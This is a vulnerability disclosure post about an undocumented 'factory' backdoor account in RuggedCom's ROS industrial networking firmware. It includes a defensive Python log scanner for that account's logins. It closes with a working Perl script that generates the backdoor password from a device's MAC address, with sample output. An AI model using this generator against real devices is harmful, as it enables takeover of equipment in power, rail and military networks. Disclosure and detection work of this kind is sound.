
RuggedCom - Backdoor Accounts in my SCADA network?

RuggedCom is one of a handful of networking vendors who capitalize on the market for "Industrial Strength" and "Hardened" networking equipment.

You'll find their gear installed in traffic control systems, railroad communications systems, power plants, electrical substations, and even US military sites. Beyond simple L2 and L3 networking, these devices are also used for serial-to-IP conversion in SCADA systems, and they even support Modbus and DNP3.

RuggedCom published a handy guide to some of their larger customers at www.ruggedcom.com/about/customers/.

My favorite quote is from a contractor who installed RuggedCom equipment at a US Air Force base: "Reliability was not an option." How unfortunately apropos.

An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address.

Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified.

An attacker with knowledge of an ROS device's MAC address may be able to gain complete administrative control of the device. The MAC address is displayed in the pre-authentication banner.

We are currently unaware of a practical solution to this problem, as published by US-CERT (http://www.kb.cert.org/vuls/id/889195).
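
Since the account cannot be disabled, operators can at least watch for its use in whatever authentication logs reach their collector. The following is an added example, not part of the original advisory: it scans syslog-style lines for authentication events naming the "factory" user and summarizes them per source. The log wording, hostnames and addresses are constructed for illustration and are assumptions, not actual ROS output.

```python
import re
from collections import Counter

# Assumed, generic syslog-style patterns; real device log wording may differ.
USER_RE = re.compile(r"\buser(?:name)?(?:\s*[=:]\s*|\s+)['\"]?(?P<user>[\w.-]+)", re.I)
SRC_RE = re.compile(r"\b(?:from|src)\s*[=:]?\s*(?P<src>\d{1,3}(?:\.\d{1,3}){3})", re.I)
FAIL_RE = re.compile(r"\b(?:fail(?:ed|ure)?|denied|invalid|rejected)\b", re.I)
BACKDOOR_USER = "factory"  # account name given in the advisory

# Constructed sample lines (hypothetical format, documentation-range addresses).
SAMPLE_LOG = """\
Apr 24 09:12:01 sw-sub01 auth: login failed for user 'factory' from 192.0.2.44
Apr 24 09:12:09 sw-sub01 auth: login succeeded for user 'factory' from 192.0.2.44
Apr 24 09:15:30 sw-sub01 auth: login succeeded for user 'admin' from 10.1.1.5
Apr 24 09:20:11 sw-sub02 auth: username=FACTORY src=198.51.100.7 result=denied
Apr 24 09:21:00 sw-sub02 system: factory defaults restored by user 'admin'
""".splitlines()

def factory_events(lines):
    """Return one dict per log line whose user field is the 'factory' account."""
    events = []
    for n, line in enumerate(lines, 1):
        # Check every user field on the line, not just the first match.
        users = {m.group("user").lower() for m in USER_RE.finditer(line)}
        if BACKDOOR_USER not in users:
            continue  # e.g. "factory defaults restored" is not a login
        src = SRC_RE.search(line)
        events.append({
            "line": n,
            "source": src.group("src") if src else None,
            "outcome": "failure" if FAIL_RE.search(line) else "success",
            "raw": line.strip(),
        })
    return events

def summarize(events):
    """Count events per (source, outcome); any success warrants immediate review."""
    return Counter((e["source"], e["outcome"]) for e in events)

if __name__ == "__main__":
    for (source, outcome), count in sorted(summarize(factory_events(SAMPLE_LOG)).items()):
        print(f"{source}\t{outcome}\t{count}")
```
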
 

Exploit:

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~ s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Example usage:

Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for "factory" is 60644375.

[jc () pig aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[jc () pig aids ros]$

 

 
